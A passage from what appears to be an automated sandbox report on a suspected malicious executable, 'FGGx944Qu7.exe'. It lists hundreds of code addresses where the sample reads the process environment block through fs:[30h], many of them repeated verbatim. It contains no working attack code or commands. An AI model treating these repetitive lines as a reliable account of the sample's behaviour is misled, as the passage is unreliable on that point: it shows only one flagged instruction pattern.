Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016760E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016320F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F80E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016720DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016880A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F208A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169437C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01698350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016263FF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016763C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016943D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016943D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01678243 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01678243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E826B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E823B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162656A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162656A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162656A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F65D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F25E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016705A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016705A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016705A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016145B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016145B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2582 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624588 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E645D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161245A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA456 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC427 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F04E5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016244B0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167A4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA49A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F64AB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162674D mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162674D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162674D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01674755 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E75D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166C730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162273C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162273C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E7E1 mov eax, dword ptr fs:[00000030h]
